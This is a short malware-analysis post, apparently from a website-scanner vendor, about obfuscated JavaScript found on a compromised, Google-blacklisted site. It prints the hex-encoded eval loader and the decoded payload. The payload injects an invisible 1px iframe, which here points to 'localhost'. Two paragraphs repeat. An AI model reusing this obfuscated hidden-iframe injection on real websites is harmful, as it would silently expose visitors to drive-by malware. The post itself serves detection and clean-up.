Website with malicious obfuscated JavaScript that injects hidden iframe to 'localhost'
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.
Website is blacklisted by Google and was seen distributing malware including 1 exploit.
When analyzing this detection to our surprise we noticed that the actual redirect URL source is 'localhost'. It looks like in this case, before the injection hacker tested the code on his local machine and uploaded it to compromised server AS IS instead of changing "localhost" to real URL. Hackers have bugs too, one might guess. We decided that it worth posting and might put a smile upon reader's face.
Website is blacklisted by Google and was seen distributing malware including 1 exploit.
When analyzing this detection to our surprise we noticed that the actual redirect URL source is 'localhost'. It looks like in this case, before the injection hacker tested the code on his local machine and uploaded it to compromised server AS IS instead of changing "localhost" to real URL. Hackers have bugs too, one might guess. We decided that it worth posting and might put a smile upon reader's face.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Thu Aug 8 11:39:31 2013
Infected website's files: 1
Threat dump:
Malware entry details
Beautified script
- asq = function () {
- return n[i];
- };
- ww = window;
- ss = String.fromCharCode;
- try {
- document.body = ~1
- } catch (qwrbtwt) {
- zz = 12 * 2 + 1 + 1;
- whwej = 12;
- } {
- try {
- whwej = ~2;
- } catch (agdsg) {
- whwej = 0;
- }
- if (whwej) {
- try {
- document.body++;
- } catch (bawetawe) {
- if (ww.document) {
- n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x68,0x66,0x79,0x66,0x71,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x6d,0x70,0x64,0x62,0x6d,0x69,0x70,0x74,0x75,0x30,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x68,0x66,0x79,0x66,0x71,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x68,0x66,0x79,0x66,0x71,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c,0xe,0xb".split(",");
- h = 2;
- s = "";
- for (i = 0; i - 481 != 0; i++) {
- k = i;
- s = s.concat(ss(eval(asq()) - 1));
- }
- z = s;
- eval("" + s);
- }
- }
- }
- }
Malicious payload
Decoded payload injects hidden malicious iframe to 'localhost'
- (function () {
- var gexep = document.createElement('iframe');
- gexep.src = 'http://localhost/';
- gexep.style.position = 'absolute';
- gexep.style.border = '0';
- gexep.style.height = '1px';
- gexep.style.width = '1px';
- gexep.style.left = '1px';
- gexep.style.top = '1px';
- if (!document.getElementById('gexep')) {
- document.write('<div id=\'gexep\'></div>');
- document.getElementById('gexep').appendChild(gexep);
- }
- })();
Blacklisting status
Website is Blacklisted by Google Safe Browsing
Blacklisted by Google |
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment